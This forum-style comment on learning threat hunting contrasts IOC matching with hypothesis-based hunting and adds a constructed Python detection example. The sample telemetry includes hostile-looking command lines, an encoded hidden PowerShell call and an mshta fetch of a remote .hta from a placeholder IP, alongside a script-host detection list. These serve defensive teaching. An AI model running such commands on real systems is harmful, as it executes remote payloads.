New to Threat Hunting


It is great that everyone here is dropping links to resources and everything, but I don't think any of this does any good unless you know how to use what you are given. Right now OP walked onto a construction site and asked how to inspect a foundation. It is good that everyone passes up their tools, but unless OP understands the fundamentals and details behind it, those tools won't do them any good. The other thing is this vendor-heavy "training" that keeps getting passed around. I like Active Countermeasures, I like Black Hills Information Security, I like CrowdStrike, I like SQRRL (bought by Amazon)... but every single one of them is going to spin the story of what they want to define threat hunting as so you are sucked into their tools/platforms as a means to generate revenue. Never hang your learning on a company that provides "free training" for a service/tool they offer.

Threat Hunting (as defined by NIST) is the proactive searching of organizational systems, networks, and infrastructure for advanced threats. The objective is to track and disrupt cyber adversaries as early as possible in the attack sequence and to measurably improve the speed and accuracy of organizational responses.

Nowhere in this definition are there restrictions. Nowhere in here do they talk about the pyramid of pain or anything else. The point is that hunting isn't straightforward - it has a maturity curve. Immature hunters will use IOC lists to "hunt", which a lot of people will argue is or isn't hunting. More advanced and mature teams use hypothesis-based hunting methods - meaning they come up with thoughts/questions/guesses and go look to prove it right or wrong.

This is my opinion here, but I do not believe that you can "learn" threat hunting by watching some videos or by sitting in some training. Sure, you might be able to replicate the activities, but the results will be wild and all over the place. Hunting comes from experience and being able to think outside of the box, to research your own questions, and to exhaust every trail before asking others. I don't mean for this to seem like I am throwing shade (definitely not, we need more people interested), but I would strongly suggest looking through prior posts here and other subreddits and absorbing the knowledge everyone puts down. For example - someone posted a similar question last week and here is my response then -


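As an added illustration of the distinction the comment above draws between IOC-list "hunting" and hypothesis-based hunting, here is a small worked example written for this page. It is not part of the original thread and not any vendor's material. The process-creation telemetry, the placeholder hash strings and the IOC feed are all constructed; the hypothesis used (an Office application spawning a script host, as a phishing-payload behaviour) is an assumed example, not one the commenter gave. The point it makes is that the IOC hunt only finds what is already on the list, while the hypothesis finds the same intrusion plus a second host that has no indicator match at all, and the baseline step shows how rare the pattern is in the environment before anyone escalates.

```python
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional, Set
import ntpath


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record (Sysmon event 1 style, fields simplified)."""
    host: str
    user: str
    parent: str                     # parent image basename
    image: str                      # path or basename of the new process
    cmdline: str
    sha256: str                     # constructed placeholder, not a real digest
    dest_ip: Optional[str] = None   # first outbound connection by this process, if any


# Constructed sample telemetry (no real incident). IPs are RFC 5737 documentation ranges.
EVENTS: List[ProcessEvent] = [
    ProcessEvent("ws01", "alice", "explorer.exe", "winword.exe", "WINWORD.EXE /n invoice.docm", "h-word"),
    ProcessEvent("ws01", "alice", "winword.exe", "powershell.exe",
                 "powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA", "h-pwsh", "203.0.113.10"),
    ProcessEvent("ws02", "bob", "explorer.exe", "chrome.exe", "chrome.exe", "h-chrome", "198.51.100.7"),
    ProcessEvent("srv01", "svc_backup", "services.exe", "backup.exe", "backup.exe --sync", "h-backup", "203.0.113.10"),
    ProcessEvent("ws03", "carol", "outlook.exe", "mshta.exe", "mshta http://198.51.100.23/x.hta", "h-mshta"),
    ProcessEvent("ws02", "bob", "explorer.exe", "powershell.exe", "powershell .\\cleanup.ps1", "h-pwsh"),
    ProcessEvent("ws03", "carol", "mshta.exe", r"C:\Users\carol\AppData\Local\Temp\update.exe",
                 "update.exe", "h-dropper", "198.51.100.23"),
]

# Constructed IOC feed: the kind of list an IOC-driven "hunt" is handed.
IOC_FEED: Dict[str, Set[str]] = {
    "sha256": {"h-dropper"},
    "ip": {"203.0.113.10"},
}


def ioc_hunt(events: List[ProcessEvent], feed: Dict[str, Set[str]]) -> List[ProcessEvent]:
    """Atomic-indicator matching: cheap and precise, but blind to anything not on the list."""
    return [e for e in events
            if e.sha256 in feed["sha256"] or (e.dest_ip is not None and e.dest_ip in feed["ip"])]


# Assumed hypothesis for the example: phishing payloads run by having an Office
# application spawn a script host. Users almost never do this deliberately.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe"}


def hypothesis_office_to_script_host(events: List[ProcessEvent]) -> List[ProcessEvent]:
    """Behavioural query that tests the hypothesis; matches need no prior indicator."""
    return [e for e in events
            if e.parent.lower() in OFFICE_APPS
            and ntpath.basename(e.image).lower() in SCRIPT_HOSTS]


def hosts_running(events: List[ProcessEvent], image: str) -> Set[str]:
    """Baseline step: on how many hosts does this child image run at all?
    A hypothesis is only useful if its matches are rarer than the child in general."""
    return {e.host for e in events if ntpath.basename(e.image).lower() == image.lower()}


def compare_hunts(events: List[ProcessEvent], feed: Dict[str, Set[str]]) -> Dict[str, Set[ProcessEvent]]:
    """Split findings into what only the IOC list saw, only the hypothesis saw, and both."""
    ioc = set(ioc_hunt(events, feed))
    hyp = set(hypothesis_office_to_script_host(events))
    return {"ioc_only": ioc - hyp, "hypothesis_only": hyp - ioc, "both": ioc & hyp}


if __name__ == "__main__":
    result = compare_hunts(EVENTS, IOC_FEED)
    for bucket, hits in result.items():
        print(bucket)
        for e in sorted(hits, key=lambda x: (x.host, x.image)):
            print(f"  {e.host:6} {e.user:10} {e.parent} -> {ntpath.basename(e.image)}  {e.cmdline}")
    pairs = Counter((e.parent.lower(), ntpath.basename(e.image).lower())
                    for e in hypothesis_office_to_script_host(EVENTS))
    print("parent->child pairs matched:", dict(pairs))
    print("hosts running powershell.exe at all:", sorted(hosts_running(EVENTS, "powershell.exe")))
```

Run it and the IOC hunt returns three events (two beaconing to the listed IP, one dropper hash), while the hypothesis returns the Word-to-PowerShell chain on ws01 and an Outlook-to-mshta chain on ws03 that has no indicator match. Only the overlap appears in `both`; the `hypothesis_only` bucket is exactly the finding an IOC-only team would have missed, and the baseline shows powershell.exe itself runs on two hosts, so the parent relationship, not the binary, is what makes the match interesting.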